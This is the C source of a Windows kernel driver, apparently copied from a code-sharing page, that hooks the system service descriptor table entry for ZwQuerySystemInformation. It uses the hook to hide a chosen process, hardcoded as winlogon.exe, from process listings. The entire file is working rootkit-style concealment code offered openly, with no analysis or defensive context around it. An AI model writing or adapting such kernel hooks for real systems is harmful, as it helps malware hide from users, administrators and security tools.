📄 winhook.c
字号:
/* ******************************************************************
Name:WinHook.c
Hook System Service Call In Windows 2000 or later version,Only
for x86 CPU.This Driver Only hide process that you setting!
Copyright (C) ndis 2004, All rights reserved.
****************************************************************** */
#include <ntddk.h>
#include "WinHook.h"
/* ******************************************************************
Macro for easy hook/unhook. On X86 implementations of Zw* func-
tions, the DWORD following the first byte is the system call number,
so we reach into the Zw function passed as a parameter, and pull the
number out. This makes system call hooking depe ndent ONLY on the
Zw* function implementation not changing.
****************************************************************** */
#define SYSCALL(_function) ServiceTable->ServiceTable[*(PULONG)((PUCHAR)_function+1)]
/* Pointer to system global service table */
PSRVTABLE ServiceTable;
#pragma code_seg("ENTRY")
/* Driver Entry */
NTSTATUS DriverEntry(IN PDRIVER_OBJECT DriverObject,IN PUNICODE_STRING RegistryPath)
{
NTSTATUS nRet;
PDEVICE_OBJECT lpHookDeviceObject;
UNICODE_STRING uszDeviceName,uszDriverName;
RtlInitUnicodeString(&uszDeviceName,L"\\Device\\WinHook");
RtlInitUnicodeString(&uszDriverName,L"\\DosDevices\\WinHook");
nRet = IoCreateDevice(
DriverObject, 0,
&uszDeviceName,
FILE_DEVICE_WINHOOK,
0, TRUE,
&lpHookDeviceObject
);
if(NT_SUCCESS(nRet)){
/* Create Symboliclink for GUI */
nRet = IoCreateSymbolicLink (&uszDriverName, &uszDeviceName );
/* Create dispatch points for all routines */
DriverObject->MajorFunction[IRP_MJ_CREATE] =
DriverObject->MajorFunction[IRP_MJ_SHUTDOWN] =
DriverObject->MajorFunction[IRP_MJ_CLOSE] =
DriverObject->MajorFunction[IRP_MJ_DEVICE_CONTROL] = DriverDispatch;
DriverObject->DriverUnload = DriverUnload;
}
if(!NT_SUCCESS(nRet)){
DbgPrint("******WinHook:Failed to create device!******\n");
if(lpHookDeviceObject){
IoDeleteDevice(lpHookDeviceObject);
}
IoDeleteSymbolicLink(&uszDriverName);
return nRet;
}
/* Pointer to system table data structure is an NTOSKRNL export */
ServiceTable = KeServiceDescriptorTable;
DbgPrint("WinHook:SystemCallService: %x\n",ServiceTable);
/* Install System Call Hook */
HookSystemCall();
DbgPrint("******WinHook:Hook System Call Service******\n");
return STATUS_SUCCESS;
}
#pragma code_seg()
#pragma code_seg("SETHOOK")
/* Install System Call Hook */
VOID HookSystemCall()
{
RealZwQuerySystemInformation = SYSCALL(ZwQuerySystemInformation);
SYSCALL(ZwQuerySystemInformation) = (PVOID)HookZwQuerySystemInformation;
return;
}
#pragma code_seg()
#pragma code_seg("UNHOOK")
/* Uninstall System Call Hook */
VOID UnhookSystemCall()
{
SYSCALL(ZwQuerySystemInformation) = (PVOID)RealZwQuerySystemInformation;
return;
}
#pragma code_seg()
#pragma code_seg("HOOK")
/* Hook function,hook ZwQuerySystemInformation for hide process you setting. */
NTSTATUS HookZwQuerySystemInformation(
IN ULONG SystemInformationClass,
IN PVOID SystemInformation,
IN ULONG SystemInformationLength,
OUT PULONG ReturnLength
)
{
NTSTATUS nRet;
UNICODE_STRING uszProcName;
RtlInitUnicodeString(&uszProcName, L"winlogon.exe");
nRet = (RealZwQuerySystemInformation)(
SystemInformationClass,
SystemInformation,
SystemInformationLength,
ReturnLength
);
if(NT_SUCCESS(nRet))
{
if(SystemInformationClass==5)
{
struct _SYSTEM_PROCESSES *lpCurr = (struct _SYSTEM_PROCESSES *)SystemInformation;
struct _SYSTEM_PROCESSES *lpPrev = NULL;
if(lpCurr->NextEntryDelta){
((char *)lpCurr += lpCurr->NextEntryDelta);
}
while(lpCurr)
{
/* Hide the process you setting */
if (RtlCompareUnicodeString(&uszProcName, &lpCurr->ProcessName, 1) == 0)
{
if(lpPrev)
{
if(lpCurr->NextEntryDelta) {
lpPrev->NextEntryDelta += lpCurr->NextEntryDelta;
}
else {
lpPrev->NextEntryDelta = 0;
}
}
else {
if(lpCurr->NextEntryDelta) {
(char *)SystemInformation += lpCurr->NextEntryDelta;
}
else {
SystemInformation = NULL;
}
}
if(lpCurr->NextEntryDelta){
((char *)lpCurr += lpCurr->NextEntryDelta);
}
else {
lpCurr = NULL;
break;
}
} /* if (RtlCompareUnicodeString(&uszProcName, &lpCurr->ProcessName, 1) == 0) */
/* View all over the process list */
if(lpCurr != NULL) {
lpPrev = lpCurr;
if(lpCurr->NextEntryDelta){
((char *)lpCurr += lpCurr->NextEntryDelta);
}
else{
lpCurr = NULL;
}
}
} /* end while(lpCurr) */
} /* End if(SystemInformationClass==5) */
} /* End if(NT_SUCCESS(nRet)) */
return nRet;
}
#pragma code_seg()
#pragma code_seg("PATCH")
/* Driver Dispatch */
NTSTATUS DriverDispatch(IN PDEVICE_OBJECT DeviceObject,IN PIRP Irp)
{
PIO_STACK_LOCATION lpIrpStack;
Irp->IoStatus.Status = STATUS_SUCCESS;
Irp->IoStatus.Information = 0;
/* Get a pointer to the current location in the Irp. */
lpIrpStack =IoGetCurrentIrpStackLocation(Irp);
switch (lpIrpStack->MajorFunction) {
case IRP_MJ_CREATE:
case IRP_MJ_SHUTDOWN:
case IRP_MJ_CLOSE:
case IRP_MJ_DEVICE_CONTROL:
DbgPrint("WinHook Dispatch\n");
break;
}
IoCompleteRequest(Irp,IO_NO_INCREMENT);
return STATUS_SUCCESS;
}
#pragma code_seg()
#pragma code_seg("UNLOAD")
/* Driver Unolad */
VOID DriverUnload(IN PDRIVER_OBJECT DriverObject)
{
UNICODE_STRING uszDriverName;
DbgPrint("******WinHook Driver Unloading******\n");
/* Uninstall System Call Hook */
UnhookSystemCall();
/* Delete the symbolic link for this device */
RtlInitUnicodeString(&uszDriverName,L"\\DosDevices\\WinHook");
IoDeleteSymbolicLink(&uszDriverName);
/* Delete the device object */
IoDeleteDevice( DriverObject->DeviceObject );
DbgPrint("******Deleted devices******\n");
return;
}
#pragma code_seg()⌨️ 快捷键说明
复制代码
Ctrl + C
搜索代码
Ctrl + F
全屏模式
F11
切换主题
Ctrl + Shift + D
显示快捷键
?
增大字号
Ctrl + =
减小字号
Ctrl + -